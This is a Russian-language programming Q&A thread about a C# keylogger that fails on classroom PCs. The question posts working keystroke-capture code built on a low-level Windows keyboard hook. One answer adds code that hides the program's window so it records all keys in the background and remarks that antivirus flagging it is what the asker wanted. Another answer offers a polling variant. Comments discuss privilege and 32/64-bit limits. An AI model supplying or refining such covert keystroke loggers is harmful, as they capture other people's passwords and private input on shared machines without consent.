# Некорректная работа перехватчика нажатых клавиш (кейлоггер) C#

Tags: c#, hook, хук

Перерыл весь интернет в попытках написать перехватчик нажатых клавиш, кейлоггер то есть (в познавательных целях, естественно).
Во всех статьях встречался один и тот же код, собственно с его примера я и писал.

Проблема вот в чем. На моем компьютере и на паре других компьютеров (на ноутбуках, если это имеет значение) программа работает, а на всех ПК, установленных у нас в учебной аудитории, - работает только если консольное окно программы находится в фокусе.

Естественно на тех ПК нет полных прав, но это ведь и не должно мешать низкоуровневым хукам? Тем более, на своем ноуте я специально создавал учетную запись с ограниченными правами и все работало как надо.

Прилагаю код класса перехватчика.

P.S. Функции `GetSymbolENG` и `GetSymbolRUS` не влезли. Там просто свитч-кейс для русской раскладки и доп символов.

---

```
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.IO;
using System.Threading;
//   dll import + keylogger
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.Diagnostics;

namespace meinhack_
{
class KeyLogger
{
    const int WH_KEYBOARD_LL = 13;
    const int HC_ACTION = 0;
    private const int WM_KEYDOWN = 0x0100;
    private static IntPtr _hookID = IntPtr.Zero;
    public static string hookedKeys = "";

    public KeyLogger()
    {
        Console.Out.WriteLine("Hook created...");
    }

    public void SetHook()
    {
        Console.Out.WriteLine("Trying to set hook...");
        _hookID = SetWindowsHookEx(WH_KEYBOARD_LL, Callback, LoadLibrary("user32.dll"), 0);
        Application.Run();
        Console.Out.WriteLine("Hook right...");
    }

    ~KeyLogger()
    {
        UnhookWindowsHookEx(_hookID);
    }        

    public delegate IntPtr KeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
    KeyboardProc Callback = KeyboardHookCallback;      


    static IntPtr KeyboardHookCallback(int nCode, IntPtr wParam, IntPtr lParam)
    {            
        if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
        {
            Console.Out.WriteLine("Trying to recognize layout...");
            string text = GetKeyboardLayoutId();
            Console.Out.WriteLine("Layout recognized...");

            int vkCode = Marshal.ReadInt32(lParam);

            Console.Out.WriteLine("Trying to get KeyState of CapsLock and Shift layout...");
            bool capsLock = (((ushort)GetKeyState(0x14)) & 0xffff) != 0;
            bool numLock = (((ushort)GetKeyState(0x90)) & 0xffff) != 0;
            bool scrollLock = (((ushort)GetKeyState(0x91)) & 0xffff) != 0;
            bool shift = (GetAsyncKeyState(Keys.LShiftKey) != 0 || GetAsyncKeyState(Keys.RShiftKey) != 0);
            Console.Out.WriteLine("KeyState of CapsLock and Shift got...");

            Console.Out.WriteLine("Trying to write key...");
            if (text == "RUS") hookedKeys += GetSymbolRUS((Keys)vkCode, shift, capsLock).ToString();
            else hookedKeys += GetSymbolENG((Keys)vkCode, shift, capsLock).ToString();
            Console.Out.WriteLine("Key written...");
        }            
        return CallNextHookEx(_hookID, nCode, wParam, lParam);
    }           

    public string GetHookedKeys()
    {
        return hookedKeys;
    }

    public void ResetHookedKeys()
    {
        hookedKeys = "";
    }

#region dllimport
    [DllImport("user32.dll", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
    public static extern IntPtr SetWindowsHookEx(int idHook, KeyboardProc lpfn, IntPtr hInstance, int threadId);

    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);

    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool UnhookWindowsHookEx(IntPtr hhk); 

    [DllImport("kernel32.dll")]
    private static extern IntPtr LoadLibrary(string dllToLoad);

    [DllImport("user32.dll", CharSet = CharSet.Auto)]
    private static extern IntPtr GetKeyboardLayout(int WindowsThreadProcessID);

    [DllImport("user32.dll", CharSet = CharSet.Auto)]
    private static extern int GetWindowThreadProcessId(IntPtr handleWindow, out int lpdwProcessID);

    [DllImport("user32.dll", CharSet = CharSet.Auto)]
    public static extern IntPtr GetForegroundWindow();

    [DllImport("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true, CallingConvention = CallingConvention.Winapi)]
    private static extern short GetKeyState(int keyCode);

    [DllImport("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true, CallingConvention = CallingConvention.Winapi)]
    private static extern short GetAsyncKeyState(Keys key);

#endregion

#region recognizeLayout
    private static InputLanguageCollection _InstalledInputLanguages;
    // Идентификатор активного потока
    private static int _ProcessId;
    // Текущий язык ввода
    private static string _CurrentInputLanguage;

    private static string GetKeyboardLayoutId()
    {
        _InstalledInputLanguages = InputLanguage.InstalledInputLanguages;

        // Получаем хендл активного окна
        IntPtr hWnd = GetForegroundWindow();
        // Получаем номер потока активного окна
        int WinThreadProcId = GetWindowThreadProcessId(hWnd, out _ProcessId);

        // Получаем раскладку
        IntPtr KeybLayout = GetKeyboardLayout(WinThreadProcId);
        // Циклом перебираем все установленные языки для проверки идентификатора
        for (int i = 0; i < _InstalledInputLanguages.Count; i++)
        {
            if (KeybLayout == _InstalledInputLanguages[i].Handle)
            {
                _CurrentInputLanguage = _InstalledInputLanguages[i].Culture.ThreeLetterWindowsLanguageName.ToString();
            }
        }
        return _CurrentInputLanguage;
    }        
#endregion

}
}
```

Comment: Есть информация, что этот хук не будет дёргаться, если в фокусе программа с повышенными привилегиями. Вы на чём проверяли?

Comment: Так как хук низкоуровневый, то ,по идеи, он должен ловить вообще все.
Не совсем понял вопрос, но все же.
Пробовал нажимать клавиши и в браузере и в блокноте и просто на рабочем столе. Результат один и тот же. У меня работает, на тех ПК - нет.

Comment: Будь это так, наличие доступа к такому хуку у не привилегированных приложений было бы серьёзной уязвимостью операционной системы с элементарным сценарием эксплуатации. Разработчики всё же не настолько идиоты :)

Comment: Насколько я знаю, это и есть основная проблема Виндовс, что можно влезть куда захочешь и перехватить любой процесс. На то и пишутся антивирусники, чтоб не давать такой возможности. P.S. на 99% уверен что моя проблема с антивирусником не связана.

Comment: Не надейтесь, что лазейки настолько просты, что до них можно дотянуться простым вызовом публичного API. У вредоносного ПО обычно трюки куда более тонкие.

Comment: Эта проблема Windows была проблемой в Windows 95. Ваши знания немного устарели, с того времени поменялось практически всё, причём по нескольку раз.

Comment: Может стоит проверять `Marshal.GetLastWin32Error`?

Comment: @ANUCHEEKIBREEKI, откуда бы он взял программы с админскими правами, если рядом админов нет и учётка не админская? А так да, хук должен работать только в программах того же пользователя.

Comment: 32-битные хуки не будут работать для 64-битных процессов и наоборот. Ну и вы не влезете к другому пользователю, если вы не администратор.

Comment: @VladD, разве? А пунтосвитчер как работает?

Comment: @Qwertiy: Две dll-ки и два хука?

Comment: @VladD, а система не делает сама общую очередь хуков? Они же на уровне системы, а не процесса.

Comment: @Qwertiy: Насколько я понимаю, хук — это внедрение dll в чужой процесс. Внедрить dll в процесс другой битности принципиально невозможно.

Comment: @Qwertiy: У меня ссылка приводит в оглавление форума. // Ага, заменил &amp на &, теперь открылось.

Comment: Давайте [продолжим обсуждение в чате](http://chat.stackexchange.com/rooms/35971/discussion-between-qwertiy-and-vladd).

Comment: @VladD, http://forum.sources.ru/index.php?showtopic=372175&st=0&#entry3272042

Comment: @Qwertiy: Ага, [вот тут](https://msdn.microsoft.com/en-us/library/windows/desktop/ms644990%28v=vs.85%29.aspx), раздел Remarks.

Comment: ок. Спасибо за данное вами направление поиска. Как буду уверен что все работает - отпишусь.

Answer (score 0):

Я удалил свой первый ответ так как программа действительно нагружала систему, а я из-за своей невнимательности не заметил это в предыдущем ответе, каюсь. Вот моя dll с winApi функциями, там есть нативный кейхук, он не нагружает систему и работает отлично, единственная проблема в том, что на консоли придется постараться, чтобы отлавливать эвенты, но вот на формах все без проблем.

Dll лежит тут [GitHub](https://github.com/Psyxoz13/Native)

В ней не только KeyboardHook но и много чего еще, но если надо, всегда можно просто код скопировать :)
Вот как это работает:

```
public partial class Form1 : Form
{
    public Form1()
    {
        InitializeComponent();

        var mainWindow = Window.GetFromHandle(Handle); //Получаем текущее окно
        mainWindow.WindowState = Native.WindowState.Hide; //Прячем окно (делает окно фоновым процессом)
    }

    private void Form1_Load(object sender, EventArgs e)
    {
        var keyboardHook = new KeyboardHook(); 
        keyboardHook.HookedKeys = keyboardHook.GetAllKeys();
        keyboardHook.KeyDown += KeyboardHook_KeyDown;
    }

    private void KeyboardHook_KeyDown(object sender, KeyEventArgs e)
    {
        MessageBox.Show(e.KeyCode.ToString());
    }
}
```

Проблема в том, что антивирус может ругаться на эту программу, но это как раз то, чего вы хотели

Comment: по ссылке ошибка 404

Answer (score 0):

Лично сам пишу макросы, использую библиотеку(У меня своя, переделал из этой) https://github.com/Nekiplay/MacrosAPI-v2
Работает отлично, вы можете перехватывать кнопки и отменять их нажатие, не жрёт много ресурсов.
Единственная проблема - обязательно нужен драйвер.

Answer (score -1):

У меня так работает, упрощенный вариант.

```
using System;
using System.Text;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace Taiber
{
    class Test
    {
        [DllImport("user32.dll")]
        private static extern short GetAsyncKeyState(int Key);

        private const int n_chars = 256;

        private void GetKey()
        {
                for (int i = 0; i < n_chars; ++i)
                {
                    if (GetAsyncKeyState(i) != 0)//Если была нажата какая-то клавиша
                    {
                        ...
                    }
                }
            }
        }
    }
}
```

Comment: я так понимаю, GetKey() потом вызывается в бесконечном цикле... Такое решение мне не подходит, так как оно жрет оооочень много ресурсов системы.

Comment: Ну а как ты хочешь иначе?

Comment: Это вообще не хук и жутко жрёт процессор...